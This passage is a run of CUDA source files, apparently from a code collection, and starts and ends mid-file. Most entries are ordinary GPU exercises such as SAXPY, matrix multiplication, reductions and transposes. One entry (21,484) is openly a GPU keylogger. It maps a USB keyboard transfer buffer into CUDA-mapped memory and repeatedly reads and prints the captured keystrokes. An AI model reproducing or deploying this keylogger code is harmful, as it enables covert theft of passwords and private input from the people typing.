NULL || N_h == NULL || P_h == NULL) { fprintf(stderr, "Failed to allocate host matrix!\n"); exit(EXIT_FAILURE); }else printf("Allocation on host successful.\n"); //initialize matrices: printf("Started initialization.\n"); for(int i = 0; i < num_of_elements; i++) { M_h[i] = rand()/(float)RAND_MAX; N_h[i] = rand()/(float)RAND_MAX; } printf("Initialization fnished.\n"); //==========================DEVICE============================================== //allocate matrixes on the device: printf("Started variables allocation for the device.\n"); printf("First matrix.\n"); float *M_d; err = cudaMalloc((void**)&M_d, size); if(err != cudaSuccess) { fprintf(stderr, "Failed to allocate host matrix!\n"); exit(EXIT_FAILURE); } else printf("Allocation successful.\n"); printf("Second matrix.\n"); float *N_d; err = cudaMalloc((void**)&N_d, size); if(err != cudaSuccess) { fprintf(stderr, "Failed to allocate host matrix!\n"); exit(EXIT_FAILURE); } else printf("Allocation successful.\n"); printf("Third matrix.\n"); float *P_d; err = cudaMalloc((void**)&P_d, size); if(err != cudaSuccess) { fprintf(stderr, "Failed to allocate host matrix!\n"); exit(EXIT_FAILURE); } else printf("Allocation successful.\n"); //copy marices into the device: printf("Started variables copying into the device.\n"); printf("First matrix.\n"); err = cudaMemcpy(M_d, M_h, size, cudaMemcpyHostToDevice); if(err != cudaSuccess) { fprintf(stderr, "Failed to copy first matrix!\n"); exit(EXIT_FAILURE); } else printf("Copying successful.\n"); printf("Second matrix.\n"); err = cudaMemcpy(N_d, N_h, size, cudaMemcpyHostToDevice); if(err != cudaSuccess) { fprintf(stderr, "Failed to copy second matrix!\n"); exit(EXIT_FAILURE); } else printf("Copying successful.\n"); //calculations: matrixMultiplication(M_d, N_d, P_d, matrix_size); err = cudaGetLastError(); if(err != cudaSuccess) { fprintf(stderr, "Failed to launch kernel. Error: %s.\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } else printf("Kerel operations successful.\n"); printf("Started variables copying from the device.\n"); err = cudaMemcpy(P_h, P_d, size, cudaMemcpyDeviceToHost); if(err != cudaSuccess) { fprintf(stderr, "Failed to copy result matrix. Error: %s.\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } else printf("Copying successful.\n"); //==========================TEST=============================================== //PrintMatrix(M_h, matrix_size); //PrintMatrix(N_h, matrix_size); //PrintMatrix(P_h, matrix_size); for(int i = 0; i < matrix_size; i++) { for(int j = 0; j < matrix_size; j++) { float tmp = 0; for(int k = 0; k < matrix_size; k++) tmp += M_h[i*matrix_size + k] * N_h[k*matrix_size + j]; //debug line: //printf("%f ",tmp); if(fabs(tmp - P_h[i*matrix_size + j]) > 1e-3) { fprintf(stderr, "Verification test failed.!\nElement at index (%d, %d) should be %f, but is %f. \n", i,j,tmp,P_h[i*matrix_size + j]); exit(EXIT_FAILURE); } } } printf("Test PASSED\n"); // Free device global memory err = cudaFree(M_d); if (err != cudaSuccess) { fprintf(stderr, "Failed to free device matrix M (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } err = cudaFree(N_d); if (err != cudaSuccess) { fprintf(stderr, "Failed to free device matrix N (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } err = cudaFree(P_d); if (err != cudaSuccess) { fprintf(stderr, "Failed to free device matrix P (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } // Free host memory free(M_h); free(N_h); free(P_h); printf("Done\n"); return 0; }
21,483
#include <stdio.h> #include <stdlib.h> #include <time.h> #include <cuda_runtime.h> #define MAX_VALUE 10 __global__ void saxpy(float *X, float *Y, float *Z, int A, int N) { int i = blockDim.x * blockIdx.x + threadIdx.x; if(i<N){ Z[i] = A * X[i] + Y[i]; } } int main() { //Define error variable cudaError_t err = cudaSuccess; //Getting Cuda Device properties cudaDeviceProp prop; err = cudaGetDeviceProperties(&prop,0); if (err != cudaSuccess) { fprintf(stderr, "Failed to allocate device vector X (error code %s)!\n",cudaGetErrorString(err)); exit(EXIT_FAILURE); } // Print GPU device name, the maximum number of thread blocks, and the maximum number of threads per block printf(" Device name: %s\n", prop.name); printf(" The maximum number of thread blocks dim[0]: %d\n", prop.maxThreadsDim[0]); printf(" The maximum number of thread blocks dim[1]: %d\n", prop.maxThreadsDim[1]); printf(" The maximum number of thread blocks dim[2]: %d\n", prop.maxThreadsDim[2]); printf(" The maximum number of thread per block: %d\n", prop.maxThreadsPerBlock); srand((unsigned int)time(NULL)); int N,A; // N is number of elements of array, A is scalar number printf("Write the size of array N: "); scanf("%d", &N); printf("Write the scalar value A: "); scanf("%d", &A); // Define size size_t size = N * sizeof(float); // Allocate the host vector X float *h_X = (float *)malloc(size); // Allocate the host vector Y float *h_Y = (float *)malloc(size); // Allocate the host vector Z float *h_Z = (float *)malloc(size); // Verify that allocations succeeded if (h_X == NULL || h_Y == NULL || h_Z == NULL) { fprintf(stderr, "Failed to allocate host vectors!\n"); exit(EXIT_FAILURE); } //Assign random values the host vector X and Y for(int i = 0; i < N; i++){ h_X[i] = ((float)rand()/(float)(RAND_MAX) * MAX_VALUE); printf("h_X[%d] : %f \n",i,h_X[i]); h_Y[i] = ((float)rand()/(float)(RAND_MAX) * MAX_VALUE); printf("h_Y[%d] : %f \n",i,h_Y[i]); } // Allocate the device input vector X float *d_X = NULL; err = cudaMalloc((void **)&d_X, size); if (err != cudaSuccess) { fprintf(stderr, "Failed to allocate device vector X (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } // Allocate the device input vector Y float *d_Y = NULL; err = cudaMalloc((void **)&d_Y, size); if (err != cudaSuccess) { fprintf(stderr, "Failed to allocate device vector Y (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } // Allocate the device input vector Z float *d_Z = NULL; err = cudaMalloc((void **)&d_Z, size); if (err != cudaSuccess) { fprintf(stderr, "Failed to allocate device vector Y (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } //Copy vectors from host to device printf("Copy input data from the host memory to the CUDA device\n"); err = cudaMemcpy(d_X, h_X, size, cudaMemcpyHostToDevice); if (err != cudaSuccess) { fprintf(stderr, "Failed to copy vector X from host to device (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } err = cudaMemcpy(d_Y, h_Y, size, cudaMemcpyHostToDevice); if (err != cudaSuccess) { fprintf(stderr, "Failed to copy vector Y from host to device (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } err = cudaMemcpy(d_Z, h_Z, size, cudaMemcpyHostToDevice); if (err != cudaSuccess) { fprintf(stderr, "Failed to copy vector Y from host to device (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } //Launch the SAXPY Cuda Kernel int threadsPerBlock = 1024; int blocksPerGrid =(N + threadsPerBlock - 1) / threadsPerBlock; saxpy<<<blocksPerGrid, threadsPerBlock>>>(d_X, d_Y, d_Z, A, N); err = cudaGetLastError(); if (err != cudaSuccess) { fprintf(stderr, "Failed to launch vectorAdd kernel (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } //Copy result vector from device to host printf("Copy output data from the CUDA device to the host memory\n"); err = cudaMemcpy(h_Z, d_Z, size, cudaMemcpyDeviceToHost); if (err != cudaSuccess) { fprintf(stderr, "Failed to copy vector C from device to host (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } //Show results for (int i = 0; i < N; ++i) { printf("h_Z[%d] : %f \n",i,h_Z[i]); } //Clean device and host memory err = cudaFree(d_X); if (err != cudaSuccess) { fprintf(stderr, "Failed to free device vector A (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } err = cudaFree(d_Y); if (err != cudaSuccess) { fprintf(stderr, "Failed to free device vector B (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } err = cudaFree(d_Z); if (err != cudaSuccess) { fprintf(stderr, "Failed to free device vector B (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } free(h_X); free(h_Y); free(h_Z); printf("Done"); return 0; }
21,484
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/types.h> #include <sys/mman.h> #include <cuda_runtime.h> #define WRITE_PAGE 0x40000000 #define SEND_BUFFER 0x50000000 __global__ void keylogger(unsigned long *A, unsigned long *B) { B[0] = A[0]; } int main(void) { int i,offset; cudaError_t err = cudaSuccess; unsigned long *u_keybd_buf,*u_scan_buf; unsigned long *scan_buf,*keybd_buf; unsigned long *p, *p2; cudaSetDeviceFlags(cudaDeviceMapHost); cudaHostAlloc((void **)&scan_buf, 0x1000, cudaHostAllocMapped); // Allocat memory p = (unsigned long *)mmap((void *)WRITE_PAGE,0x1000,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,NULL); // modify page table p2 = (unsigned long *)mmap((void *)SEND_BUFFER,0x1000,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,NULL); // transfer_buffer // remove dummy data in memory (1) for( i = 0; i < 0x200; i++ ){ p[i] = 0x7777777777777777; p2[i] = 0x7777777777777777; } // Wait until the kernel writes a urbp->transfer_buffer to this address. memset( p2, 0, 0x1000 ); while( p2[0] == 0 ){ usleep( 500000 ); } // When a value is returned from the kernel, urbp->transfer_buffer stored in p2[0]. printf("transfer_buffer : %llX\n", p2[0] ); offset = p2[0] & 0xfff; // This mean is that p2 is not exist in host process memory. munmap(p2, 0x1000); // Allocate memory on the device. cudaMalloc(&u_scan_buf,512); // Registers an existing host memory range for use by CUDA. cudaHostRegister((void *)WRITE_PAGE, 0x1000, cudaHostRegisterMapped); // Passes back device pointer of mapped host memory allocated by cudaHostAlloc or registered by cudaHostRegister. cudaHostGetDevicePointer((void **)&u_keybd_buf,(void *)(WRITE_PAGE+offset),0); // cudaHostGetDevicePointer ( void** pDevice, void* pHost, unsigned int flags ) // This mean is that p(keyboard_buffer) is not exist in host process memory. munmap(p, 0x1000); // Finally, Capturing Keystrokes while(1){ keylogger<<<1, 1>>>(u_keybd_buf, u_scan_buf); cudaThreadSynchronize(); err = cudaGetLastError(); if (err != cudaSuccess){ printf("Failed (error : %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } // Copies data between host and device. cudaMemcpy(scan_buf,u_scan_buf,8,cudaMemcpyDeviceToHost); printf("%llX\n",scan_buf[0]); usleep(80000); } cudaThreadExit(); return 0; }
21,485
#include <stdio.h> #include <stdlib.h> #include <time.h> #include <cuda.h> #define THREADS_PER_BLOCK 1024 unsigned int getmaxcu(unsigned int *, unsigned int); unsigned int getmax(unsigned int *, unsigned int); void getDeviceInfo() { int nDevices; cudaGetDeviceCount(&nDevices); for (int i = 0; i < nDevices; i++) { struct cudaDeviceProp prop; cudaGetDeviceProperties(&prop, i); printf("Device Number: %d\n", i); printf(" Device name: %s\n", prop.name); printf(" Memory Clock Rate (KHz): %d\n", prop.memoryClockRate); printf(" Memory Bus Width (bits): %d\n", prop.memoryBusWidth); printf(" Peak Memory Bandwidth (GB/s): %f\n\n", 2.0*prop.memoryClockRate*(prop.memoryBusWidth/8)/1.0e6); } } __global__ void getmaxCUDA1(unsigned int * num_d, int new_size, unsigned int * block_result) { __shared__ unsigned int local_num[THREADS_PER_BLOCK]; int tid = threadIdx.x; int thread_id = blockDim.x * blockIdx.x + threadIdx.x; //Grab the array from the global memory to shared memory.(In one block) local_num[tid] = 0; if(thread_id < new_size) { local_num[tid] = num_d[thread_id]; } __syncthreads(); for(int i = (blockDim.x)/2; i >= 1 ; i = i / 2) { int stride = i; if(tid < stride && (tid + stride) < blockDim.x) { if(local_num[tid] < local_num[tid+stride]) { local_num[tid] = local_num[tid+stride]; } } __syncthreads(); } //Get the block max. if(tid == 0) { block_result[blockIdx.x] = local_num[0]; } } int main(int argc, char *argv[]) { unsigned int size = 0; // The size of the array unsigned int i; // loop index unsigned int * numbers; //pointer to the array if(argc !=2) { printf("usage: maxseq num\n"); printf("num = size of the array\n"); exit(1); } size = atol(argv[1]); numbers = (unsigned int *)malloc(size * sizeof(unsigned int)); if( !numbers ) { printf("Unable to allocate mem for an array of size %u\n", size); exit(1); } // getDeviceInfo(); srand(time(NULL)); // setting a seed for the random number generator // Fill-up the array with random numbers from 0 to size-1 for( i = 0; i < size; i++){ numbers[i] = rand() % size; } printf(" The maximum number in the array is: %u\n", getmaxcu(numbers, size)); free(numbers); exit(0); } /* input: pointer to an array of long int number of elements in the array output: the maximum number of the array */ unsigned int getmaxcu(unsigned int num[], unsigned int size) { unsigned int max = num[0]; // printf("max[5] is %d max [6] is %d max[1] is %d\n",num[5], num[6], num[1]); unsigned int* num_d; unsigned int* block_result; unsigned int* result; unsigned int block_num = size / THREADS_PER_BLOCK; if(size % THREADS_PER_BLOCK != 0) { block_num = block_num + 1; } unsigned int block_count = block_num; int sizen = size*sizeof(unsigned int); int sizeb = block_num*sizeof(unsigned int); int new_size = size; //1.Transfer num[] to device memory. cudaMalloc((void**)&num_d, sizen); cudaMemcpy(num_d, num, sizen, cudaMemcpyHostToDevice); cudaMalloc((void**)&block_result, sizeb); //2.Kernel invocation code. while(block_num >= 1) { if(block_num == 1) { getmaxCUDA1<<<block_num, THREADS_PER_BLOCK>>>(num_d, new_size, block_result); block_num--; } else { getmaxCUDA1<<<block_num, THREADS_PER_BLOCK>>>(num_d, new_size, block_result); new_size = block_num; if(new_size % THREADS_PER_BLOCK != 0) { block_num = new_size / THREADS_PER_BLOCK + 1; } else {block_num = new_size / THREADS_PER_BLOCK;} } num_d = block_result; } result = (unsigned int*) malloc(block_count * sizeof(unsigned int)); cudaMemcpy(result, block_result, sizeb, cudaMemcpyDeviceToHost); max = result[0]; //3. Free device memory for num[]. cudaFree(num_d); cudaFree(block_result); return( max ); } //sequential code. not used. unsigned int getmax(unsigned int num[], unsigned int size) { unsigned int i; unsigned int max = num[0]; for(i = 1; i < size; i++) if(num[i] > max) max = num[i]; return( max ); }
21,486
/* __global__ void shared_memory_load_throughput(float *c_buffer) { const size_t index = blockIdx.x * blockDim.x + threadIdx.x; __shared__ float shared_buffer[256]; if (threadIdx.x < 256) { shared_buffer[threadIdx.x] = (float)threadIdx.x; } __syncthreads(); float c = (float)index; for (int j = 0; j < 32; ++j) { for (int i = 0; i < 256; ++i) { c += shared_buffer[i]; } } c_buffer[index] = c; } */ #define BUF_SIZE 4096 __global__ void shared_memory_latency(int *out, const int stride) { __shared__ size_t shared_buf[BUF_SIZE / sizeof(size_t)]; int stride_num = BUF_SIZE / stride; if (stride_num <= 1) { return; } for (int i = 0; i < stride_num - 1; ++i) { shared_buf[i * stride / sizeof(size_t)] = (size_t)(shared_buf + (i + 1) * stride / sizeof(size_t)); } shared_buf[(stride_num - 1) * stride / sizeof(size_t)] = (size_t)shared_buf; size_t *p = shared_buf; size_t access_num = 1024 * 1024 * 64; for (size_t i = 0; i < access_num; ++i) { p = (size_t*)*p; } *out = (int)*p; }
21,487
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <stdlib.h> cudaError_t addWithCuda(float *Picture, int m, int n); __global__ void PictureKernel(float *d_Pin, float *d_Pout, int m, int n) { int Row = blockIdx.y * blockDim.y + threadIdx.y; int Col = blockIdx.x * blockDim.x + threadIdx.x; if((Row < m) && (Col < n)) { d_Pout[Row * n + Col] = 2 * d_Pin[Row * n + Col]; } } int main() { // create a picture int i, j; float picture[9][12]; for(i = 0; i < 9; i++) { for(j = 0; j < 12; j++) { picture[i][j] = i * 12 + j; } } // mapping picture data into 1D array float *picture_1D; picture_1D = (float *)malloc(9*12*sizeof(float)); for(i = 0; i < 9; i++) { for(j = 0; j < 12; j++) { picture_1D[i*12 + j] = picture[i][j]; } } // before calling picturekernel for(i = 0; i < 9; i++) { for(j = 0; j < 12; j++) { printf("%1.0f ", picture_1D[i*12 + j]); } printf("\n"); } // call the addwithcuda function. cudaError_t cudaStatus = addWithCuda(picture_1D, 9, 12); if (cudaStatus != cudaSuccess) { fprintf(stderr, "addWithCuda failed!"); return 1; } printf("\n*******============================================================*********\n"); // after calling picturekernel for(i = 0; i < 9; i++) { for(j = 0; j < 12; j++) { printf("%1.0f ", picture_1D[i*12 + j]); } printf("\n"); } // cudaDeviceReset must be called before exiting in order for profiling and // tracing tools such as Nsight and Visual Profiler to show complete traces. cudaStatus = cudaDeviceReset(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaDeviceReset failed!"); return 1; } return 0; } // Helper function for using CUDA to add vectors in parallel. cudaError_t addWithCuda(float *Picture, int m, int n) { float *d_Pin, *d_Pout; int Psize = m * n * sizeof(float); cudaMalloc((void**)&d_Pin, Psize); cudaMemcpy(d_Pin, Picture, Psize, cudaMemcpyHostToDevice); cudaMalloc((void**)&d_Pout, Psize); cudaError_t cudaStatus; dim3 threadsPerBlocks(16, 16, 1); dim3 blocksPerGird(ceil(n/16.0), ceil(m/16.0), 1); // Choose which GPU to run on, change this on a multi-GPU system. cudaStatus = cudaSetDevice(0); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaSetDevice failed! Do you have a CUDA-capable GPU installed?"); goto Error; } // Launch a kernel on the GPU with one thread for each element. PictureKernel<<<blocksPerGird, threadsPerBlocks>>>(d_Pin, d_Pout, m, n); // Check for any errors launching the kernel cudaStatus = cudaGetLastError(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus)); goto Error; } // cudaDeviceSynchronize waits for the kernel to finish, and returns // any errors encountered during the launch. cudaStatus = cudaDeviceSynchronize(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaDeviceSynchronize returned error code %d after launching addKernel!\n", cudaStatus); goto Error; } // Copy output vector from GPU buffer to host memory. cudaStatus = cudaMemcpy(Picture, d_Pout, Psize, cudaMemcpyDeviceToHost); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!"); goto Error; } Error: cudaFree(d_Pin); cudaFree(d_Pout); return cudaStatus; }
21,488
// CUDA blockDim, gridDim configured as method 2 in https://blog.csdn.net/yongjiankuang/article/details/90180559 #include <bits/stdc++.h> #include <sys/time.h> #include <cuda.h> #include <cuda_runtime.h> using namespace std; void mul_cpu(int row_A, int col_A, int col_B, int* mat_A, int* mat_B, int* mat_C){ for(int i = 0; i < row_A; i++){ for(int j = 0; j < col_B; j++){ for(int k = 0; k < col_A; k++){ mat_C[i * col_B + j] += mat_A[i * col_A + k] * mat_B[k * col_B + j]; } } } } __global__ void mul_cuda(int row_A, int col_A, int col_B, int* mat_A_CUDA, int* mat_B_CUDA, int* mat_C_CUDA){ int row = blockIdx.y * blockDim.y + threadIdx.y; int col = blockIdx.x * blockDim.x + threadIdx.x; if(row < row_A && col < col_B && row >= 0 && col >= 0){ for(int k = 0; k < col_A; k++){ mat_C_CUDA[row * col_B + col] += mat_A_CUDA[row * col_A + k] * mat_B_CUDA[k * col_B + col]; } } } __global__ void mul_cuda_dim_1D(int row_A, int col_A, int col_B, int* mat_A_CUDA, int* mat_B_CUDA, int* mat_C_CUDA){ int offset = blockIdx.x * blockDim.x + threadIdx.x; int row = offset / row_A; int col = offset % col_B; if(row < row_A && col < col_B && row >= 0 && col >= 0){ for(int k = 0; k < col_A; k++){ mat_C_CUDA[row * col_B + col] += mat_A_CUDA[row * col_A + k] * mat_B_CUDA[k * col_B + col]; } } } int* init(int row, int col, bool is_C){ int* mat = (int *)malloc(row * col * sizeof(int )); random_device rd; mt19937 generator(rd()); uniform_int_distribution<int> unif(-1000, 1000); for(int i = 0; i < row; i++){ for(int j = 0; j < col; j++){ mat[i * col + j] = is_C ? 0 : unif(generator); } } return mat; } int main(int argc, char* argv[]){ /*-------------- CPU init ------------*/ int row_A, col_A, col_B; int* mat_A; int* mat_B; int* mat_C; int* mat_A_CUDA; int* mat_B_CUDA; int* mat_C_CUDA; int* mat_A_CUDA_pinned; int* mat_B_CUDA_pinned; int* mat_C_CUDA_pinned; int* res_CPU; int* res_GPU; if(argc != 5){ fprintf(stderr, "%s", "Usage: ./a.out $row_A $col_A $col_B $thread_count_in_block in 1Dim direction\n"); exit(-1); } row_A = atoi(argv[1]); col_A = atoi(argv[2]); col_B = atoi(argv[3]); assert(row_A > 0 && col_A > 0 && col_B > 0); mat_A = init(row_A, col_A, false); mat_B = init(col_A, col_B, false); mat_C = init(row_A, col_B, true); res_CPU = init(row_A, col_B, true); /*-------------- CPU run -------------*/ struct timeval start, end; gettimeofday(&start, 0); mul_cpu(row_A, col_A, col_B, mat_A, mat_B, mat_C); gettimeofday(&end, 0); int sec = end.tv_sec - start.tv_sec; int usec = end.tv_usec - start.tv_usec; int t_cpu = sec * 1000 + (usec / 1000); printf("CPU time (ms): %d\n", t_cpu); /*------------- Clear ---------------*/ res_CPU = init(row_A, col_B, true); for(int i = 0; i < row_A; i++){ for(int j = 0; j < col_B; j++){ res_CPU[i * col_B + j] = mat_C[i * col_B + j]; mat_C[i * col_B + j] = 0; } } /*-------------- CUDA init ------------*/ cudaError_t ce_A, ce_B, ce_C; ce_A = cudaMalloc((void**) &mat_A_CUDA, row_A * col_A * sizeof(int)); ce_B = cudaMalloc((void**) &mat_B_CUDA, col_A * col_B * sizeof(int)); ce_C = cudaMalloc((void**) &mat_C_CUDA, row_A * col_B * sizeof(int)); if( ce_A != cudaSuccess || ce_B != cudaSuccess || ce_C != cudaSuccess){ fprintf(stderr, "%s", "cudaMalloc failed\n"); exit(1); } ce_A = cudaMemcpy(mat_A_CUDA, mat_A, row_A * col_A * sizeof(int), cudaMemcpyHostToDevice); ce_B = cudaMemcpy(mat_B_CUDA, mat_B, col_A * col_B * sizeof(int), cudaMemcpyHostToDevice); ce_C = cudaMemcpy(mat_C_CUDA, mat_C, row_A * col_B * sizeof(int), cudaMemcpyHostToDevice); if( ce_A != cudaSuccess || ce_B != cudaSuccess || ce_C != cudaSuccess){ fprintf(stderr, "%s", "cudaMemcpyHostToDevice failed\n"); exit(2); } const int THREAD_SQRT = (int)sqrt(atoi(argv[4])); // const dim3 dimBlock(THREAD_SQRT, THREAD_SQRT); // const dim3 dimGrid((col_B + THREAD_SQRT - 1) / THREAD_SQRT, (row_A + THREAD_SQRT - 1) / THREAD_SQRT); // ceiling const dim3 dimBlock(THREAD_SQRT * THREAD_SQRT); const dim3 dimGrid((col_B * row_A + THREAD_SQRT * THREAD_SQRT - 1) / (THREAD_SQRT * THREAD_SQRT)); /*-------------- CUDA run -------------*/ gettimeofday(&start, 0); mul_cuda_dim_1D<<<dimGrid, dimBlock>>>(row_A, col_A, col_B, mat_A_CUDA, mat_B_CUDA, mat_C_CUDA); cudaError_t ce_K; // cuda error for kernel ce_K = cudaDeviceSynchronize(); if(ce_K != cudaSuccess){ fprintf(stderr, "%s", "cudaDeviceSynchronize failed\n"); exit(3); } gettimeofday(&end, 0); sec = end.tv_sec - start.tv_sec; usec = end.tv_usec - start.tv_usec; int t_gpu = sec * 1000 + (usec / 1000); printf("GPU time (ms): %d\n", t_gpu); /*------- Check integrity -------------*/ res_GPU = init(row_A, col_B, true); ce_C = cudaMemcpy(res_GPU, mat_C_CUDA, row_A * col_B * sizeof(int), cudaMemcpyDeviceToHost); if(ce_C != cudaSuccess){ fprintf(stderr, "%s", "cudaMemcpyDeviceToHost failed\n"); exit(4); } printf("Check integrity\n"); for(int i = 0; i < row_A; i++){ for(int j = 0; j < col_B; j++){ assert(res_CPU[i * col_B + j] == res_GPU[i * col_B + j]); } } printf("Integrity pass!, CPU result == GPU result, all finished\n"); printf("[row_A, col_A, col_B, block_size(thread cnt), Accelerate ratio (times)]: \n"); printf("%d, %d, %d, %d, %f\n\n", row_A, col_A, col_B, atoi(argv[4]), (float)t_cpu / (float)t_gpu); /*------- Clear memory -------------*/ cudaFree(mat_A_CUDA); cudaFree(mat_B_CUDA); cudaFree(mat_C_CUDA); /*-------------- CUDA init, pinned mem -*/ ce_A = cudaMallocHost((void**) &mat_A_CUDA_pinned, row_A * col_A * sizeof(int)); ce_B = cudaMallocHost((void**) &mat_B_CUDA_pinned, col_A * col_B * sizeof(int)); ce_C = cudaMallocHost((void**) &mat_C_CUDA_pinned, row_A * col_B * sizeof(int)); if( ce_A != cudaSuccess || ce_B != cudaSuccess || ce_C != cudaSuccess){ fprintf(stderr, "%s", "cudaMallocHost failed\n"); exit(1); } ce_A = cudaMemcpy(mat_A_CUDA_pinned, mat_A, row_A * col_A * sizeof(int), cudaMemcpyHostToDevice); ce_B = cudaMemcpy(mat_B_CUDA_pinned, mat_B, col_A * col_B * sizeof(int), cudaMemcpyHostToDevice); ce_C = cudaMemcpy(mat_C_CUDA_pinned, mat_C, row_A * col_B * sizeof(int), cudaMemcpyHostToDevice); if( ce_A != cudaSuccess || ce_B != cudaSuccess || ce_C != cudaSuccess){ fprintf(stderr, "%s", "cudaMemcpyHostToDevice, pinned memory failed\n"); exit(2); } /*-------------- CUDA run, pinned mem -*/ gettimeofday(&start, 0); mul_cuda_dim_1D<<<dimGrid, dimBlock>>>(row_A, col_A, col_B, mat_A_CUDA_pinned, mat_B_CUDA_pinned, mat_C_CUDA_pinned); ce_K = cudaDeviceSynchronize(); if(ce_K != cudaSuccess){ fprintf(stderr, "%s", "cudaDeviceSynchronize, pinned memory failed\n"); exit(3); } gettimeofday(&end, 0); sec = end.tv_sec - start.tv_sec; usec = end.tv_usec - start.tv_usec; t_gpu = sec * 1000 + (usec / 1000); printf("GPU time, pinned memory (ms): %d\n", t_gpu); /*------- Check integrity, pinned mem -*/ res_GPU = init(row_A, col_B, true); ce_C = cudaMemcpy(res_GPU, mat_C_CUDA_pinned, row_A * col_B * sizeof(int), cudaMemcpyDeviceToHost); if(ce_C != cudaSuccess){ fprintf(stderr, "%s", "cudaMemcpyDeviceToHost, pinned memory failed\n"); exit(4); } printf("Check integrity, pinned memory\n"); for(int i = 0; i < row_A; i++){ for(int j = 0; j < col_B; j++){ assert(res_CPU[i * col_B + j] == res_GPU[i * col_B + j]); } } printf("Integrity pass, pinned memory!, CPU result == GPU result, all finished\n"); printf("[row_A, col_A, col_B, block_size(thread cnt), Accelerate ratio (times)]: \n"); printf("%d, %d, %d, %d, %f\n\n", row_A, col_A, col_B, atoi(argv[4]), (float)t_cpu / (float)t_gpu); /*------- Clear memory -------------*/ free(mat_A); free(mat_B); free(mat_C); cudaFreeHost(mat_A_CUDA_pinned); cudaFreeHost(mat_B_CUDA_pinned); cudaFreeHost(mat_C_CUDA_pinned); free(res_CPU); free(res_GPU); return 0; }
21,489
#include "includes.h" __global__ void readOffsetUnroll2(float *A, float *B, float *C, const int n, int offset) { unsigned int i = blockIdx.x * blockDim.x * 2 + threadIdx.x; unsigned int k = i + offset; if (k < n) C[i] = A[k] + B[k]; if (k + blockDim.x < n) { C[i + blockDim.x] = A[k + blockDim.x] + B[k + blockDim.x]; } }
21,490
#include "includes.h" __global__ void matmulKernel(float* mat1,float* mat2, float* matP,int dim) { int thread_x,thread_y,i; thread_x=blockIdx.x*blockDim.x+threadIdx.x; thread_y=blockIdx.y*blockDim.y+threadIdx.y; if(thread_x<dim&&thread_y<dim) { float P_value=0.; for(i=0;i<dim;i++) { P_value+=mat1[thread_y*dim+i]*mat2[i*dim+thread_x]; } matP[thread_y*dim+thread_x]=P_value; } }
21,491
#include "includes.h" __global__ void suma( int *a, int *b, int *c, int n, int m) { int index = blockIdx.x + blockIdx.y * blockDim.y; if(index < n*m){ c[index] = a[index] + b[index]; } }
21,492
#include <iostream> #include <stdio.h> #include <sys/time.h> #include <cuda.h> using namespace std; #define SH_DIM 32 #define CUDA_CHECK_RETURN(value) {\ cudaError_t _m_cudaStat = value;\ if (_m_cudaStat != cudaSuccess) {\ fprintf(stderr, "Error %s at line %d in file %s\n", cudaGetErrorString(_m_cudaStat), __LINE__, __FILE__);\ exit(1);\ }} __global__ void transpose(float *A, float *B) { __shared__ float buffer_s[SH_DIM][SH_DIM + 1]; int i = threadIdx.x + blockIdx.x * blockDim.x; int j = threadIdx.y + blockIdx.y * blockDim.y; int N = blockDim.x * gridDim.x; buffer_s[threadIdx.y][threadIdx.x] = A[i + j * N]; __syncthreads(); i = threadIdx.x + blockIdx.y * blockDim.x; j = threadIdx.y + blockIdx.x * blockDim.y; B[i + j * N] = buffer_s[threadIdx.x][threadIdx.y]; } void InitMatrix(float *A, float *B, int size) { for (int i = 0; i < size; i++) for (int j = 0; j < size; j++) { int k = size * i + j; A[k] = k; B[k] = 0; } } void printMatrix(float *C, int size) { for (int i = 0; i < size * size; i++) cout << C[i] << "\t"; cout << endl; } double wtime() { struct timeval t; gettimeofday(&t, NULL); return (double)t.tv_sec + (double)t.tv_usec * 1E-6; } int main(int argc, char* argv[]) { if (argc != 4) { cout << "launch parametrs: [matrix size] [threads_x] [threads_y]" << endl; return 1; } int size = atoi(argv[1]); int threads_per_block_x = atoi(argv[2]); int threads_per_block_y = atoi(argv[3]); srand(time(NULL)); float *A = new float[size * size]; float *B = new float[size * size]; float *dev_A, *dev_B; cudaMalloc((void**)&dev_A, size * size * sizeof(float)); cudaMalloc((void**)&dev_B, size * size * sizeof(float)); InitMatrix(A, B, size); dim3 threads(threads_per_block_x, threads_per_block_y); dim3 blocks(size / threads.x, size / threads.y); cudaMemcpy(dev_A, A, size * size * sizeof(float), cudaMemcpyHostToDevice); cudaMemcpy(dev_B, B, size * size * sizeof(float), cudaMemcpyHostToDevice); float elapsedTime; cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); cudaEventRecord(start, 0); transpose <<< blocks, threads >>> (dev_A, dev_B); cudaEventRecord(stop, 0); cudaEventSynchronize(stop); CUDA_CHECK_RETURN(cudaDeviceSynchronize()); CUDA_CHECK_RETURN(cudaGetLastError()); cudaEventElapsedTime(&elapsedTime, start, stop); 